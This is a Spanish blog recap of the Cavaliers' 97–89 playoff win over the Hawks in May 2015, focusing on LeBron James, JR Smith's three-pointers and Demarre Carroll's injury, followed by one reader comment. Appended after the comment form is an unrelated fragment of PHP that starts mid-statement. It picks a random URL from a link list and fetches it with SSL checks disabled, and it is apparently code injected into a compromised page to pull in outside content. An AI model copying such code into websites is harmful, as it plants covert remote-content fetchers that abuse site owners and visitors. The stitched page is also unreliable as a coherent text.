La Crónica: Ignición

21 de May de 2015 por txusma

Los Cavaliers ponen rumbo a las finales haciendo saltar el factor cancha por los aires. Lebron James cumplió con su papel y esta vez tuvo a su lado a la reencarnación de Michael Jordan personalizada en JR Smith que vio el aro como una piscina olímpica. Demarre Carroll se lesionó, puede que de gravedad, en los últimos compases del partido pero aún así, los Hawks consiguieron meter algo de miedo a David Blatt y sus pupilos. El primer partido ha encendido la mecha pero el segundo, con muchas incógnitas, marcará tendencia. 201505202229809460449

Cleveland Cavaliers 97 – Atlanta Hawks 89

A falta de 3 minutos para acabar el primer cuarto los Hawks mandaban de 9 y Lebron James se acababa de sentar tras cometer su segunda falta personal. Con Jeff Teague a la cabeza los Hawks estaban apabullando a los teóricos favoritos y las cosas pintaban muy bien para los locales. Sin embargo, 4 minutos después de empezar el segundo cuarto la diferencia ya no existía gracias a 3 triples prácticamente consecutivos de JR Smith. “King” James se ocuparía de aguantar a los suyos durante ese período con 14 puntos en 7 canastas de 9 intentos. Tras el descanso el partido se mantendría igualado hasta que 2 triples más de Smith (con un rival encima ambos) otorgaron una primera ventaja a los Cavaliers que el propio escolta se encargó de aumentar hasta los 18 puntos al principio del último cuarto. En 7 minutos (los 5 últimos del tercer cuarto y los 2 primeros del último) el parcial fue de 22-4 nada menos.

Pero los Hawks se sobrepusieron a las adversidades, sobretodo a la que suposo la lesión de su mejor jugador en estos playoffs, Demarre Carroll, a falta de un 5 minutos para el final. Sus gestos de dolor apuntan a lesión grave, habrá que estar atentos a las pruebas que le harán hoy. Como comentábamos, a pesar de todo los locales se pusieron a solo 4 puntos a falta de menos de un minuto para el final con Kent Bazemore como protagonista pero el mismo Lebron volvió a poner tierra de por medio con un mate marca de la casa.  Un error de Paul Millsap desde el triple certificó la derrota local.

Lebron acabó el partido con 31 puntos, 8 rebotes y 6 asistencias pero el gran protagonista fue JR Smith con 28 puntos en 16 lanzamientos con un 8 de 12 en T3. Los Cavaliers le necesitarán a un nivel cercano si quieren disputar las finales.

Comenta

Un comentario a esta entrada

  1. Ruxixón dice:
    #1

    Parece que lo de Carroll se queda en un susto,menos mal porque tenía una pinta pésima cuando se produjo la acción.Mejor ganar con todos en la pista,mayor espectáculo y mayor mérito.

    Sorprendente el emparejamiento Millsap-LeBron,al menos en el primer partido no ha funcionado y eso que buscaron las cosquillas a LeBron -el propio Carroll y el 4 de los Hawks- para sacarlo del juego,pero gran demostración de James.JR Smith tocado por los dioses,cuando entra en ese periodo de trance da igual como se las tire que entran igual.Que penita que después tenga la cabeza como la tiene,si no estaríamos hablando de uno de los mejores 2 de la liga.Clave también el rebote ofensivo de Thompson y Mozgov,bien ganado la batalla en la pintura por físico.Ahí tendrán que incidir más los Hawks si quieren igualar la eliminatoria.Por otra parte el meneo de Teague a Irving tremendo,ya lo comentabais en la previa.Si Atlanta consigue solucionar lo del rebote y logran una mejor noche de sus suplentes -como se nota lo de Scott respecto al año pasado- harán sufrir a Cleveland.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>